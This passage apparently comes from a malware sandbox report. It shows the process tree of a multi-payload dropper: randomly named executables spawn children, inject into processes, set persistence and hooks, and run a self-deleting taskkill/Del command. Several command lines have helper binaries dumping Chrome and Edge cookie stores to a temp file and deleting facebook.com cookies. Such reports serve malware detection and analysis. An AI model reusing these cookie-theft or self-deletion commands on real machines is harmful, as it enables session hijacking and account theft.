            - C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
              - Suspicious use of SetWindowsHookEx
            - C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
              - Suspicious use of SetWindowsHookEx
            - C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
            - C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
            - C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
            - C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
            - C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
            - C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
            - C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
            - C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
            - C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
            - C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
            - C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        - "C:\Users\Admin\Documents\S9vvbu_thmJNivbyrd5cbgjY.exe"
          - Executes dropped EXE
          - Suspicious use of SetWindowsHookEx
            - C:\Windows\SysWOW64\WerFault.exe -u -p 5288 -s 296
              - Program crash
              - Suspicious behavior: EnumeratesProcesses
        - "C:\Users\Admin\Documents\1JXoSiUoBQDRFxKQt6PfAJQT.exe"
          - Executes dropped EXE
          - Suspicious use of SetWindowsHookEx
            - C:\Windows\SysWOW64\WerFault.exe -u -p 5276 -s 296
              - Program crash
              - Checks processor information in registry
              - Enumerates system info in registry
              - Suspicious behavior: EnumeratesProcesses
        - "C:\Users\Admin\Documents\ZM0tOe8uO666xAL03x_SEt7G.exe"
          - Executes dropped EXE
        - "C:\Users\Admin\Documents\nmRKRFlsM2jdww3bmd_iqMIN.exe"
          - Executes dropped EXE
          - Suspicious use of SetThreadContext
            - C:\Users\Admin\Documents\nmRKRFlsM2jdww3bmd_iqMIN.exe
              - Executes dropped EXE
            - C:\Users\Admin\Documents\nmRKRFlsM2jdww3bmd_iqMIN.exe
            - C:\Users\Admin\Documents\nmRKRFlsM2jdww3bmd_iqMIN.exe
              - Executes dropped EXE
        - "C:\Users\Admin\Documents\OaUqDiJqLrReD6nAIAxVSWA8.exe"
          - Executes dropped EXE
          - Loads dropped DLL
          - Suspicious use of AdjustPrivilegeToken
        - "C:\Users\Admin\Documents\K9nJsFAus_AD4WbNTjIG3wOs.exe"
          - Executes dropped EXE
          - Suspicious use of SetThreadContext
            - C:\Users\Admin\Documents\K9nJsFAus_AD4WbNTjIG3wOs.exe
              - Executes dropped EXE
            - C:\Users\Admin\Documents\K9nJsFAus_AD4WbNTjIG3wOs.exe
              - Executes dropped EXE
            - C:\Users\Admin\Documents\K9nJsFAus_AD4WbNTjIG3wOs.exe
              - Executes dropped EXE
        - "C:\Users\Admin\Documents\h5Mf7fCP0iLoTpkZt0_ezgBy.exe"
          - Executes dropped EXE
          - Suspicious use of SetThreadContext
            - "C:\Users\Admin\Documents\h5Mf7fCP0iLoTpkZt0_ezgBy.exe"
              - Drops file in Drivers directory
              - Drops file in Program Files directory
              - Suspicious use of SetWindowsHookEx
                - "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
                  - Adds Run key to start application
                  - Enumerates system info in registry
                  - Suspicious use of FindShellTrayWindow
                    - "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x1a0,0x1a4,0x1a8,0x130,0x1ac,0x7ff9fdcb46f8,0x7ff9fdcb4708,0x7ff9fdcb4718
                    - "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2204 /prefetch:2
                    - "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 /prefetch:3
                    - "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2728 /prefetch:8
                    - "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
                    - "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
                    - "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3720 /prefetch:1
                    - "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2720 /prefetch:1
                    - "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4416 /prefetch:1
                    - "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5688 /prefetch:8
                    - "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5656 /prefetch:8
                    - "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5656 /prefetch:8
                    - "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5760 /prefetch:1
                    - "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6168 /prefetch:8
                    - "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --lang=en-US --service-sandbox-type=entity_extraction --mojo-platform-channel-handle=6328 /prefetch:8
                    - "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.PageScreenshotProcessor --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6464 /prefetch:8
                    - "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1896 /prefetch:8
                    - "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1900 /prefetch:8
                    - "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4764 /prefetch:8
                    - "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6532 /prefetch:8
                    - "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5000 /prefetch:8
                    - "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5752 /prefetch:1
                    - "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1708 /prefetch:1
                    - "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6020 /prefetch:2
                    - "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6112 /prefetch:1
                    - "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6608 /prefetch:8
                    - "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.PageScreenshotProcessor --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5984 /prefetch:8
                    - "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4460 /prefetch:8
                    - "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5004 /prefetch:1
                    - "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4652 /prefetch:1
                    - "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.PageScreenshotProcessor --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2536 /prefetch:8
                    - "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3748 /prefetch:1
                    - "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6484 /prefetch:1
                    - "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.PageScreenshotProcessor --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7184 /prefetch:8
                    - "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7104 /prefetch:1
                    - "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7260 /prefetch:1
                    - "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7520 /prefetch:1
                    - "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7360 /prefetch:1
                    - "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7568 /prefetch:1
                    - "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.PageScreenshotProcessor --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8040 /prefetch:8
                    - "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7516 /prefetch:1
                    - "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7504 /prefetch:1
                    - "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.PageScreenshotProcessor --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7640 /prefetch:8
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3848 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1636 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7684 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.PageScreenshotProcessor --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8292 /prefetch:86⤵
-
    "cmd.exe" /C taskkill /F /PID 5968 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\h5Mf7fCP0iLoTpkZt0_ezgBy.exe" (image path: C:\Windows\SysWOW64\cmd.exe)
      taskkill /F /PID 5968 (image path: C:\Windows\SysWOW64\taskkill.exe)
        - Kills process with taskkill
    "cmd.exe" /C taskkill /F /PID 5968 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\h5Mf7fCP0iLoTpkZt0_ezgBy.exe" (image path: C:\Windows\SysWOW64\cmd.exe)
      taskkill /F /PID 5968 (image path: C:\Windows\SysWOW64\taskkill.exe)
        - Kills process with taskkill
"C:\Users\Admin\Documents\LvJ59gJxc3LSPWvaIC75WK3C.exe"
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of AdjustPrivilegeToken
"C:\Users\Admin\Documents\S5JNKYGQ09fmPKqgYZFlX5Wl.exe"
  - Executes dropped EXE
  C:\Windows\SysWOW64\WerFault.exe -u -p 5192 -s 244
    - Program crash
"C:\Users\Admin\Documents\i51OEtivp64F1h3jriSb9179.exe"
  - Executes dropped EXE
  C:\Users\Admin\Documents\i51OEtivp64F1h3jriSb9179.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
"C:\Users\Admin\Documents\yOpfFns9feXR1oA37BXrUSoj.exe"
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  "C:\Users\Admin\Documents\yOpfFns9feXR1oA37BXrUSoj.exe"
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 (image path: C:\Windows\System32\Conhost.exe)
      - Executes dropped EXE
      - Suspicious use of SetWindowsHookEx
"C:\Users\Admin\Documents\bEYG8MCmwS_N0mgL9uYFs3Jb.exe"
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of SetWindowsHookEx
  "C:\Users\Admin\Documents\bEYG8MCmwS_N0mgL9uYFs3Jb.exe"
    - Executes dropped EXE
    - Checks SCSI registry key(s)
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
"C:\Users\Admin\Documents\bAGRnF23dqqSQc9GLsP_8f2i.exe"
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of AdjustPrivilegeToken
"C:\Users\Admin\Documents\ZP8ROxtPgq7xzmkTnY1ILt2W.exe"
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  C:\Windows\SysWOW64\WerFault.exe -u -p 5340 -s 320
    - Program crash
    - Checks processor information in registry
    - Enumerates system info in registry
"C:\Users\Admin\Documents\MsKeXpA3JCm5KJWAfbFTLe6p.exe"
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
"C:\Users\Admin\Documents\bXB9E3wOjLBBoAzWOKy1jhXH.exe"
  - Executes dropped EXE
  C:\Windows\SysWOW64\WerFault.exe -u -p 5592 -s 240
    - Program crash
    - Checks processor information in registry
    - Enumerates system info in registry
"C:\Users\Admin\Documents\bFClUtu0XfsHUGnX6uO9BE2D.exe"
  - Executes dropped EXE
  - Drops file in Program Files directory
  - Suspicious use of SetWindowsHookEx
  "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
    - Executes dropped EXE
    - Drops startup file
    - Suspicious use of SetWindowsHookEx
    C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
    C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
    C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
    C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
      - Executes dropped EXE
      - Suspicious use of SetWindowsHookEx
    C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      - Executes dropped EXE
      - Suspicious use of SetWindowsHookEx
    C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
      - Suspicious use of SetWindowsHookEx
    C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
    C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
      - Suspicious use of SetWindowsHookEx
  "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
  "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
    - Executes dropped EXE
    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      - Suspicious use of NtCreateProcessExOtherParentProcess
      - Executes dropped EXE
      - Suspicious use of SetWindowsHookEx
    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      - Suspicious use of SetWindowsHookEx
    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      - Suspicious use of SetWindowsHookEx
    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
"C:\Users\Admin\Documents\KaN6V1t36aPvGbjwrCNT4frv.exe"
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  C:\Windows\SysWOW64\WerFault.exe -u -p 5556 -s 300
    - Program crash
    - Checks processor information in registry
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
"C:\Users\Admin\Documents\iHcz2PjFZ8e9IDvRcRQLV9o9.exe"
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of SetWindowsHookEx
  "C:\Users\Admin\Documents\iHcz2PjFZ8e9IDvRcRQLV9o9.exe"
    - Executes dropped EXE
"C:\Users\Admin\Documents\1cu20YjSd19Ml5gGnIdtbCyZ.exe"
  "C:\Users\Admin\Documents\1cu20YjSd19Ml5gGnIdtbCyZ.exe" -q
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
"C:\Users\Admin\Documents\AGV_ZCjRSXUJEYPKIJWOth72.exe"
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  "C:\Users\Admin\AppData\Roaming\8421129.exe"
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    C:\Windows\system32\WerFault.exe -u -p 1400 -s 2340
      - Program crash
      - Checks processor information in registry
      - Enumerates system info in registry
  "C:\Users\Admin\AppData\Roaming\3544711.exe"
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
"C:\Users\Admin\Documents\X6pFteX1hujq71gAoddJIl03.exe"
  - Executes dropped EXE
